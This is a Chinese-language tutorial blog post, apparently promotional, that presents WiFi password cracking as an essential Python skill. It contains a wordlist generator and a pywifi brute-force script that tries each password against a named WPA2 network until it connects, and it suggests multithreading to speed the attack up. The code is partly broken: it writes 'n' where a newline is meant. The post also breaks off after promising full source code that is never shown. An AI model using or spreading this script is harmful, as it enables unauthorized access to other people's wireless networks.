引言 破解WIFI是Python程序员必备的技能之一。如今,WIFI已经普及到了每个角落,对于Python程序员来说,没有网络也不再是问题!想要进行WIFI破解,Python和字典是必不可少的工具。弱口令也是破解的核心所在。构建一个强大的字典,你就能够破解更多的WIFI密码。如果您想获取大量Python学习资料,请私信小编001!
import itertools
key = '0123456789.qwertyuiopasdfghjklzxcvbnm'#密码包含这些字符
passwords = itertools.product(key,repeat = 3)
f = open('password.txt','a')
for i in passwords:
f.write("".join(i))
f.write('n')
f.close()
原理 WIFI破解的原理是通过操纵网卡,逐个尝试密码本中的密码,直到找到正确的密码,这样电脑就能够连接到该WIFI网络上。Python脚本的作用就是逐个尝试密码本中的密码,如果找到正确的密码,就会创建一个以WIFI名称命名的文件,并将正确的密码记录在其中。生成字典的Python代码可以使用itertools包来实现。
pywifi模块 pywifi模块无法通过pip install进行安装。您需要从pywifi官方文档下载压缩包,然后将其解压并复制到Libsite-packages路径下,最后双击运行setup.py进行安装。
import pywifi
import time
from pywifi import const
class PoJie():
def __init__(self,name):
self.name = name
wifi = pywifi.PyWiFi() # 抓取网卡接口
self.iface = wifi.interfaces()[0]#获取网卡
self.iface.disconnect() # 断开所有连接
time.sleep(1)
if self.iface.status() in [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]: # 测试是否已经断开网卡连接
print("已经成功断开网卡连接")
else:
print("网卡连接断开失败")
def solve(self):
x = 1
f = open('password.txt','r')
lines = f.readlines()
for line in lines:
print('正在尝试第%d次'%(x))
x += 1
profile = pywifi.Profile()#创建wifi配置对象
profile.ssid = self.name#wifi名称
profile.key = line#WiFi密码
profile.auth = const.AUTH_ALG_OPEN#网卡的开放
profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法,一般是 WPA2PSK
profile.cipher = const.CIPHER_TYPE_CCMP#加密单元
self.iface.remove_all_network_profiles()#删除所有的wifi文件
tem_profile = self.iface.add_network_profile(profile)#添加新的WiFi文件
self.iface.connect(tem_profile)#连接
time.sleep(3)#连接需要时间
if self.iface.status() == const.IFACE_CONNECTED:#判断是否连接成功
print("成功连接,密码是%s"%(line))
break
else:
print("连接失败,密码是%s"%(line))
if __name__ == "__main__":
name = 'Honor V10'
obj = PoJie(name = name)
obj.solve()
从脚本的角度来看,每次尝试一个密码需要2秒的时间。即使是对于8位纯数字密码的尝试,所需的时间t为:(计算公式省略)。这还只是针对8位纯数字密码的情况。因此,想要通过pywifi破解密码几乎是不可能的。当然,您可以通过多线程等方法来缩短破解时间。但是,如果您不幸忘记了某个WIFI的密码,但是知道它可能是几个或几十个密码中的一个,那么您可以使用脚本来找回密码。(当然,直接重置WIFI可能更快…)如果您真的想要破解WIFI密码,还是建议在虚拟机中进行操作更为可靠。以下是Python的完整源代码: